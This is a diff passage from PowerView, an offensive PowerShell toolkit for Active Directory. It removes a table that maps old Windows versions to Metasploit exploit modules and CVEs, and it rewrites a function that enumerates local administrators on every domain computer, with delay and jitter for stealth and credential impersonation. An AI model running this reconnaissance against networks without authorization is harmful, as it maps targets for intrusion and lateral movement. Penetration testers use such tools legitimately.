Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") - $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") - $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") - $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") - $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") - $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") - $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") - $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") - $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") - $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") - $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows Server 2008 R2","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") - $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") - $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") - $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") - $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") - $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") - $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") - $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") - $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") - $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") - - # Status user - Write-Verbose "[*] Checking computers for vulnerable OS and SP levels..." - - # ---------------------------------------------------------------- - # Setup data table to store vulnerable systems - # ---------------------------------------------------------------- - - # Create data table to house vulnerable server list - $TableVulnComputers = New-Object System.Data.DataTable - $Null = $TableVulnComputers.Columns.Add('ComputerName') - $Null = $TableVulnComputers.Columns.Add('OperatingSystem') - $Null = $TableVulnComputers.Columns.Add('ServicePack') - $Null = $TableVulnComputers.Columns.Add('LastLogon') - $Null = $TableVulnComputers.Columns.Add('MsfModule') - $Null = $TableVulnComputers.Columns.Add('CVE') - - # Iterate through each exploit - $TableExploits | ForEach-Object { - - $ExploitOS = $_.OperatingSystem - $ExploitSP = $_.ServicePack - $ExploitMsf = $_.MsfModule - $ExploitCVE = $_.CVE - - # Iterate through each ADS computer - $TableAdsComputers | ForEach-Object { - - $AdsHostname = $_.Hostname - $AdsOS = $_.OperatingSystem - $AdsSP = $_.ServicePack - $AdsLast = $_.LastLogon - - # Add exploitable systems to vul computers data table - if ($AdsOS -like "$ExploitOS*" -and $AdsSP -like "$ExploitSP" ) { - # Add domain computer to data table - $Null = $TableVulnComputers.Rows.Add($AdsHostname,$AdsOS,$AdsSP,$AdsLast,$ExploitMsf,$ExploitCVE) - } - } - } - - # Display results - $VulnComputer = $TableVulnComputers | Select-Object ComputerName -Unique | Measure-Object - $VulnComputerCount = $VulnComputer.Count +Specifies an LDAP query string that is used to search for computer objects. - if ($VulnComputer.Count -gt 0) { - # Return vulnerable server list order with some hack date casting - Write-Verbose "[+] Found $VulnComputerCount potentially vulnerable systems!" - $TableVulnComputers | Sort-Object { $_.lastlogon -as [datetime]} -Descending - } - else { - Write-Verbose "[-] No vulnerable systems were found." - } -} +.PARAMETER ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. -function Invoke-EnumerateLocalAdmin { -<# - .SYNOPSIS +.PARAMETER ComputerOperatingSystem - This function queries the domain for all active machines with - Get-NetComputer, then for each server it queries the local - Administrators with Get-NetLocalGroup. +Search computers with a specific operating system, wildcards accepted. - Author: @harmj0y - License: BSD 3-Clause +.PARAMETER ComputerServicePack - .PARAMETER ComputerName +Search computers with a specific service pack, wildcards accepted. - Host array to enumerate, passable on the pipeline. +.PARAMETER ComputerSiteName - .PARAMETER ComputerFile +Search computers in the specific AD Site name, wildcards accepted. - File of hostnames/IPs to search. +.PARAMETER GroupName - .PARAMETER ComputerFilter +The local group name to query for users. If not given, it defaults to "Administrators". - Host filter name to query AD for, wildcards accepted. +.PARAMETER Method - .PARAMETER ComputerADSpath +The collection method to use, defaults to 'API', also accepts 'WinNT'. - The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.PARAMETER Server - .PARAMETER NoPing +Specifies an Active Directory server (domain controller) to bind to. - Switch. Don't ping each host to ensure it's up before enumerating. +.PARAMETER SearchScope - .PARAMETER Delay +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). - Delay between enumerating hosts, defaults to 0 +.PARAMETER ResultPageSize - .PARAMETER Jitter +Specifies the PageSize to set for the LDAP searcher object. - Jitter for the host delay, defaults to +/- 0.3 +.PARAMETER ServerTimeLimit - .PARAMETER OutFile +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - Output results to a specified csv output file. +.PARAMETER Tombstone - .PARAMETER NoClobber +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Switch. Don't overwrite any existing output file. +.PARAMETER Credential - .PARAMETER TrustGroups +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. - Switch. Only return results that are not part of the local machine - or the machine's domain. Old Invoke-EnumerateLocalTrustGroup - functionality. - - .PARAMETER DomainOnly +.PARAMETER Delay - Switch. Only return domain (non-local) results +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. - .PARAMETER Domain +.PARAMETER Jitter - Domain to query for machines, defaults to the current domain. - - .PARAMETER DomainController +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 - Domain controller to reflect LDAP queries through. +.PARAMETER Threads - .PARAMETER SearchForest +The number of threads to use for user searching, defaults to 20. - Switch. Search all domains in the forest for target users instead of just - a single domain. +.EXAMPLE - .PARAMETER API +Find-DomainLocalGroupMember - Switch. Use API calls instead of the WinNT service provider. Less information, - but the results are faster. +Enumerates the local group memberships for all reachable machines in the current domain. - .PARAMETER Threads +.EXAMPLE - The maximum concurrent threads to execute. +Find-DomainLocalGroupMember -Domain dev.testlab.local - .EXAMPLE +Enumerates the local group memberships for all reachable machines the dev.testlab.local domain. - PS C:\> Invoke-EnumerateLocalAdmin +.EXAMPLE - Enumerates the members of local administrators for all machines - in the current domain. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred - .EXAMPLE +Enumerates the local group memberships for all reachable machines the dev.testlab.local +domain using the alternate credentials. - PS C:\> Invoke-EnumerateLocalAdmin -Threads 10 +.OUTPUTS - Threaded local admin enumeration, replaces Invoke-EnumerateLocalAdminThreaded +PowerView.LocalGroupMember.API - .LINK +Custom PSObject with translated group property fields from API results. - http://blog.harmj0y.net/ +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. #> - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroupMember.API')] + [OutputType('PowerView.LocalGroupMember.WinNT')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] [String[]] $ComputerName, - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] + [ValidateNotNullOrEmpty()] [String] - $ComputerFile, + $ComputerDomain, + [ValidateNotNullOrEmpty()] [String] - $ComputerFilter, + $ComputerLDAPFilter, + [ValidateNotNullOrEmpty()] [String] - $ComputerADSpath, + $ComputerSearchBase, - [Switch] - $NoPing, - - [UInt32] - $Delay = 0, - - [Double] - $Jitter = .3, + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] [String] - $OutFile, + $ComputerServicePack, - [Switch] - $NoClobber, + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, - [Switch] - $TrustGroups, + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String] + $GroupName = 'Administrators', - [Switch] - $DomainOnly, + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $Domain, + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $DomainController, + $SearchScope = 'Subtree', - [Switch] - $SearchForest, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, - [ValidateRange(1,100)] + [ValidateRange(1, 10000)] [Int] - $Threads, + $ServerTimeLimit, [Switch] - $API - ) + $Tombstone, - begin { - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' - } - - # random object for delay - $RandNo = New-Object System.Random - - Write-Verbose "[*] Running Invoke-EnumerateLocalAdmin with delay of $Delay" + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, - # if we're using a host list, read the targets in and add them to the target list - if($ComputerFile) { - $ComputerName = Get-Content -Path $ComputerFile - } + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, - if(!$ComputerName) { - [array]$ComputerName = @() + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, - if($Domain) { - $TargetDomains = @($Domain) - } - elseif($SearchForest) { - # get ALL the domains in the forest to search - $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } - } - else { - # use the local domain - $TargetDomains = @( (Get-NetDomain).name ) - } + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for hosts" - $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController - } - - # remove any null target hosts, uniquify the list and shuffle it - $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } - if($($ComputerName.Count) -eq 0) { - throw "No hosts found!" - } + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName } - - # delete any existing output file if it already exists - if(!$NoClobber) { - if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile } + else { + Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname } - - if($TrustGroups) { - - Write-Verbose "Determining domain trust groups" - - # find all group names that have one or more users in another domain - $TrustGroupNames = Find-ForeignGroup -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.GroupName } | Sort-Object -Unique - - $TrustGroupsSIDs = $TrustGroupNames | ForEach-Object { - # ignore the builtin administrators group for a DC (S-1-5-32-544) - # TODO: ignore all default built in sids? - Get-NetGroup -Domain $Domain -DomainController $DomainController -GroupName $_ -FullData | Where-Object { $_.objectsid -notmatch "S-1-5-32-544" } | ForEach-Object { $_.objectsid } - } - - # query for the primary domain controller so we can extract the domain SID for filtering - $DomainSID = Get-DomainSID -Domain $Domain -DomainController $DomainController + Write-Verbose "[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainLocalGroupMember] No hosts found to enumerate' } - # script block that enumerates a server + # the host enumeration block we're using to enumerate all servers $HostEnumBlock = { - param($ComputerName, $Ping, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly) + Param($ComputerName, $GroupName, $Method, $TokenHandle) - # optionally check if the server is up first - $Up = $True - if($Ping) { - $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName + # Add check if user defaults to/selects "Administrators" + if ($GroupName -eq "Administrators") { + $AdminSecurityIdentifier = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid,$null) + $GroupName = ($AdminSecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value -split "\\")[-1] } - if($Up) { - # grab the users for the local admins on this server - if($API) { - $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName -API - } - else { - $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName - } - - # if we just want to return cross-trust users - if($DomainSID) { - # get the local machine SID - $LocalSID = ($LocalAdmins | Where-Object { $_.SID -match '.*-500$' }).SID -replace "-500$" - Write-Verbose "LocalSid for $ComputerName : $LocalSID" - # filter out accounts that begin with the machine SID and domain SID - # but preserve any groups that have users across a trust ($TrustGroupSIDS) - $LocalAdmins = $LocalAdmins | Where-Object { ($TrustGroupsSIDs -contains $_.SID) -or ((-not $_.SID.startsWith($LocalSID)) -and (-not $_.SID.startsWith($DomainSID))) } - } - if($DomainOnly) { - $LocalAdmins = $LocalAdmins | Where-Object {$_.IsDomain} - } + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } - if($LocalAdmins -and ($LocalAdmins.Length -ne 0)) { - # output the results to a csv if specified - if($OutFile) { - $LocalAdmins | Export-PowerViewCSV -OutFile $OutFile - } - else { - # otherwise return the user objects - $LocalAdmins + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $NetLocalGroupMemberArguments = @{ + 'ComputerName' = $TargetComputer + 'Method' = $Method + 'GroupName' = $GroupName } - } - else { - Write-Verbose "[!] No users returned from $ComputerName" + Get-NetLocalGroupMember @NetLocalGroupMemberArguments } } - } - } - - process { - if($Threads) { - Write-Verbose "Using threading with threads = $Threads" - - # if we're using threading, kick off the script block with Invoke-ThreadedFunction - $ScriptParams = @{ - 'Ping' = $(-not $NoPing) - 'OutFile' = $OutFile - 'DomainSID' = $DomainSID - 'TrustGroupsSIDs' = $TrustGroupsSIDs + if ($TokenHandle) { + Invoke-RevertToSelf } + } - # kick off the threaded script block + arguments - if($API) { - $ScriptParams['API'] = $True + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential } - - if($DomainOnly) { - $ScriptParams['DomainOnly'] = $True + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet } - - Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } + } - else { - if(-not $NoPing -and ($ComputerName.count -ne 1)) { - # ping all hosts in parallel - $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} - $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 - } + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { - Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" + Write-Verbose "[Find-DomainLocalGroupMember] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter" $Counter = 0 + $RandNo = New-Object System.Random - ForEach ($Computer in $ComputerName) { - + ForEach ($TargetComputer in $TargetComputers) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) - Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" - $ScriptArgs = @($Computer, $False, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly) + Write-Verbose "[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken + } + } + else { + Write-Verbose "[Find-DomainLocalGroupMember] Using threading with threads: $Threads" - Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $ScriptArgs + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'GroupName' = $GroupName + 'Method' = $Method + 'TokenHandle' = $LogonToken } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken } } } @@ -12515,139 +19435,264 @@ function Invoke-EnumerateLocalAdmin { # ######################################################## -function Get-NetDomainTrust { +function Get-DomainTrust { <# - .SYNOPSIS +.SYNOPSIS + +Return all domain trusts for the current domain or a specified domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current (or a remote) +domain using a number of methods. By default, and LDAP search using the filter +'(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified +LDAP is used as well. If the -NET flag is specified, the .NET method +GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain +object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is +used to enumerate instead. + +.PARAMETER Domain + +Specifies the domain to query for trusts, defaults to the current domain. + +.PARAMETER API + +Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in +.NET methods. - Return all domain trusts for the current domain or - a specified domain. +.PARAMETER NET - .PARAMETER Domain +Switch. Use .NET queries to enumerate trusts instead of the default LDAP method. - The domain whose trusts to enumerate, defaults to the current domain. +.PARAMETER LDAPFilter - .PARAMETER DomainController +Specifies an LDAP query string that is used to filter Active Directory objects. - Domain controller to reflect LDAP queries through. +.PARAMETER Properties - .PARAMETER ADSpath +Specifies the properties of the output object to retrieve from the server. - The LDAP source to search through, e.g. "LDAP://DC=testlab,DC=local". - Useful for global catalog queries ;) +.PARAMETER SearchBase - .PARAMETER API +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts. +.PARAMETER Server - .PARAMETER LDAP +Specifies an Active Directory server (domain controller) to bind to. - Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. - More likely to get around network segmentation, but not as accurate. +.PARAMETER SearchScope - .PARAMETER PageSize +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - The PageSize to set for the LDAP searcher object. +.PARAMETER ResultPageSize - .EXAMPLE +Specifies the PageSize to set for the LDAP searcher object. - PS C:\> Get-NetDomainTrust +.PARAMETER ServerTimeLimit - Return domain trusts for the current domain using built in .NET methods. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - .EXAMPLE +.PARAMETER Tombstone - PS C:\> Get-NetDomainTrust -Domain "prod.testlab.local" +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Return domain trusts for the "prod.testlab.local" domain using .NET methods +.PARAMETER FindOne - .EXAMPLE +Only return one result object. - PS C:\> Get-NetDomainTrust -LDAP -Domain 